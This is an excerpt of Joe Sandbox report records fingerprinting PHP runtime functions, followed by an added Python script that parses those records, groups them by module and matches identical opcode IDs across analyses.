                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: ErrorLast
                                                • String ID:
                                                • API String ID: 1452528299-0
                                                • Opcode ID: bbe9895d534b658101cce7e74ca5bd95b80ee12bf15f37732e53d0ee5c009e2b
                                                • Instruction ID: 6a3978a519f4cc085dd91118dc0e1b36f211bb4e42773ac87f7c03dc1edbab36
                                                • Opcode Fuzzy Hash: bbe9895d534b658101cce7e74ca5bd95b80ee12bf15f37732e53d0ee5c009e2b
                                                • Instruction Fuzzy Hash: 6211F420F0DA46C2FA545767A9441352262EF8AFF0F1446F7D95E07BF5DF2CB8419620
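The records above are the Joe Sandbox IDA plugin's per-function fingerprints (API ID, Opcode ID, Instruction ID and the two fuzzy hashes) for two modules mapped inside the php process, one based at 0x7FF7498C0000 and one at 0x7FFE1A520000. The report itself offers no way to work with them outside the web UI, so the following Python is an added example, not Joe Sandbox's own code: it reads records in exactly this layout into dicts, groups them by the module they were lifted from, and exact-matches Opcode IDs between two record sets so the same PHP runtime functions can be recognised in another analysis. The sample input is two records copied from this page; the decoding of the .sdmp filename fields (process index, run number, region base) is an assumption inferred from the snapshot name hcaresult_24_2_... and is labelled as such in the code.

```python
"""Parser for the per-function "Joe Sandbox IDA Plugin" records on this page. A record
runs from an "APIs" header to its "Instruction Fuzzy Hash" line; each becomes a dict."""
import re
from collections import defaultdict

# "name.MODULE(args), ref: ADDR" or "name.MODULE ref: ADDR", optionally prefixed with
# "Part of subcall function ADDR: ", exactly as the report prints API call lines.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>[^.\s]+)\.(?P<module>[A-Za-z0-9_\-.]+?)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(
    r"^(?P<dump>\S+), Offset: (?P<base>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Constructed sample input: two records copied from this page in the report's own
# layout (minus the "Download File" link text the page fuses onto "Associated").
SAMPLE = """\
APIs
• __zend_realloc.PHP8TS(?,0000000100000001,0000000100000001,00007FF7498C6EDF,?,?,?,00007FF7498CB8EE), ref: 00007FF7498C6FEC
• memmove.VCRUNTIME140(?,?,?,00007FF7498CB8EE), ref: 00007FF7498C7043
Memory Dump Source
• Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
• Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
Similarity
• API ID: memmove$__zend_malloc__zend_realloc
• String ID:
• API String ID: 195525502-0
• Opcode ID: e6e82a00cea3ee3d0e073c8dbcb9d34bc24b8eef3bd3751d0547fbe4a8c80dd7
• Instruction Fuzzy Hash: 0E219872608B81C2DB00EF19E400368BBB4F785BB4F948226DF68077C0DB78D0A6C350
APIs
  • Part of subcall function 00007FFE1A5269C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A5225CE), ref: 00007FFE1A5269CE
• terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A52EE2A
Strings
Memory Dump Source
• Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
Similarity
• API ID: CurrentImageNonwritableUnwindabortterminate
• String ID: csm$f
• API String ID: 4189928240-629598281
• Opcode ID: fb015faef4bf75acf24bdce02b26b27ea635390a237ea967a8c643fc2c3390a7
• Instruction Fuzzy Hash: E7E06C71E0CB41C1F7145BA2B14017D2B65EF46F74F1440F7DA8806656CF3DD8A44611
"""


def parse_records(text):
    """One dict per record: parsed API calls, string bullets, and the key/value bullets."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                       # every record starts with this header
            rec = {"apis": [], "strings": [], "fields": {}}
            records.append(rec)
            section = "APIs"
        elif rec is None or not line:
            continue
        elif line in SECTIONS:
            section = line
        elif line.startswith("•"):
            body = line[1:].strip()
            if section == "APIs":
                m = API_RE.match(body)
                rec["apis"].append(m.groupdict() if m else {"raw": body})
            elif section == "Strings":
                rec["strings"].append(body)
            else:
                key, _, value = body.partition(":")
                key, value = key.strip(), value.strip()
                src = SOURCE_RE.match(value) if key == "Source File" else None
                if src:                          # dump name and module base share a line
                    rec["fields"].update(dump=src["dump"], module_base=src["base"].upper(),
                                         based_on_pe=src["pe"] == "true")
                elif key == "Associated":        # repeated: the module's other regions
                    rec["fields"].setdefault("associated", []).append(value)
                else:
                    rec["fields"][key] = value
    return records


def decode_dump_name(dump):
    """Split a .sdmp name on dots. Assumption (not documented on this page): field 0 is
    the process index and field 1 the run number, consistent with the snapshot name
    hcaresult_24_2_... (0x18 == 24, run 2); field 3 is the region base address."""
    parts = (dump[:-5] if dump.endswith(".sdmp") else dump).split(".")
    return {"process": int(parts[0], 16), "run": int(parts[1], 16),
            "region_base": parts[3].upper()}


def group_by_module(records):
    """Module base address -> records lifted from that module."""
    groups = defaultdict(list)
    for r in records:
        groups[r["fields"].get("module_base", "?")].append(r)
    return dict(groups)


def shared_functions(records_a, records_b):
    """Pairs of records with identical Opcode IDs: functions that are the same at the
    opcode level in both samples (an exact match, not a fuzzy-hash comparison)."""
    by_opcode = {r["fields"]["Opcode ID"]: r for r in records_a if "Opcode ID" in r["fields"]}
    return [(by_opcode[r["fields"]["Opcode ID"]], r) for r in records_b
            if r["fields"].get("Opcode ID") in by_opcode]
```

Feed the whole report text to parse_records and pivot with group_by_module to see which functions came from which module; the associated list carries the module's other memory regions. The Instruction Fuzzy Hash and Opcode Fuzzy Hash values are in Joe Sandbox's own format, so the block compares Opcode IDs exactly rather than inventing a similarity score for them.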